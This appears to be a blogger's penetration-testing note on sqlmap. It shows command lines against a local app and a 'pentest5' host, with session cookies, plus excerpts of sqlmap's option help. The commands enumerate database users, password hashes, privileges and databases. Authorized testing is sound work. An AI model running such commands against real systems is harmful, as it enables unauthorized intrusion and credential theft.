• sqlmap


    https://github.com/sqlmapproject/sqlmap

    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches covering database fingerprinting, data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

    http://sqlmap.org/

    Test cases

    http://localhost:8086/project/controller/action (POST)

    C:\Users\clu\Downloads\sqlmapproject-sqlmap-d4d83b2\sqlmap.py -u http://localhost:8086/project/controller/action --data="search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30"

    search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30

    %userprofile%\AppData\Local\sqlmap\output\localhost

    .\sqlmap.py -u "https://host:port/pentest5/Campaign/GetMyCampaignList" --data="search=cam&periodStatus=0&__RequestVerificationToken=Hgf410s-TtjOD2MoQFIQ7ebBFik__POnfJ3kbJjQ8CLK1XyS-d3GyY6gd_UHCkQs0cSTKfVks77VnBz00" --cookie="WebSession=4bpzpunlduq5z0cpzf5ysmnr; __RequestVerificationToken=h5owU63jNKlDzObOGxW4h7caJMJfDsBnxcN2U9Vj_iHQku9mkd-OY4GSgjG_YGzfnWLMYg2; _ga=GA1.2.2054830099.1592468707; _gid=GA1.2.1238954720.1592468707; EdenredAdminSite=...; EdenredParticipantSite=..." --delay=0 --timeout=30 --retries=0 -p "search, periodStatus" --dbms="Microsoft SQL Server" --os=Windows --level=3 --risk=1 --threads=4 --time-sec=5 -b --current-user --current-db --hostname --is-dba --users --passwords --privileges --roles --dbs --batch --answers="crack=N,dict=N"

    Parameter description

    https://github.com/sqlmapproject/sqlmap/wiki/Usage

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    -p TESTPARAMETER    Testable parameter(s)

    --dbms=DBMS         Force back-end DBMS to provided value
    --os=OS             Force back-end DBMS operating system to provided value
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)

    Enumeration:
        These options can be used to enumerate the back-end database
        management system information, structure and data contained in the
        tables. Moreover you can run your own SQL statements
     
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases

    General:
        These options can be used to set some general working parameters
     
    --batch             Never ask for user input, use the default behavior
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
     
  • Original article: https://www.cnblogs.com/chucklu/p/13158070.html